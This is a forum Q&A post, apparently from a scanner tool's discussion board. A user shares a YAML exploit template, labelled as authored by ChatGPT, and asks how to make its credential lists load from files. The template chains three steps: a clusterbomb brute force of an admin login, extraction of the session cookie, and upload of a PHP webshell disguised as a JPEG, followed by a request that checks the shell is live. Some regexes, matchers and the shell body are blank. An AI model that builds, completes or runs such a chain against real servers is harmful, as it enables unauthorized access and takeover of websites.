Dictionary import problem #6318
Unanswered
JackeyLov5 asked this question in Q&A
Replies: 0 comments
This is a template PoC for uploading a shell after logging in. It works fine when I use a list for user and pass, but an error occurs when I change to a file import.

`id: login-upload-rce-complete
info:
name: 登录爆破 + 上传 WebShell + 验证
author: ChatGPT
severity: critical
description: |
使用用户名/密码爆破登录,提取 PHPSESSID,再上传 webshell 并验证。
http:
# Step 1: Log in and extract PHPSESSID
raw:
|
POST /admin/auth/login.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/admin/auth/index.html
User-Agent: Mozilla/5.0
Connection: close
username={{username}}&password={{password}}
payloads:
username:
- file: "usernames.txt"
password:
- file: "passwords.txt"
attack: clusterbomb
extractors:
name: session_id
internal: true
part: header
group: 1
regex:
# Step 2: Upload WebShell
raw:
|
POST /admin/base/upload HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session_id}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
User-Agent: Mozilla/5.0
Connection: close
------WebKitFormBoundary
Content-Disposition: form-data; name="media"; filename="1.php"
Content-Type: image/jpeg
------WebKitFormBoundary--
matchers:
part: body
words:
extractors:
type: regex
part: body
internal: true
name: upload_path_raw
regex:
type: dsl
name: upload_path
internal: true
dsl:
# Step 3: Verify WebShell
raw:
GET /uploads/{{upload_path}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
Accept: text/html
Connection: close
matchers:
dsl:
extractors:
name: shell_url
dsl:
`
This code is in file format (wrong). It is OK to write username and password directly in a list, but it is obviously not elegant enough. Can any expert tell me how to change it? Thank you.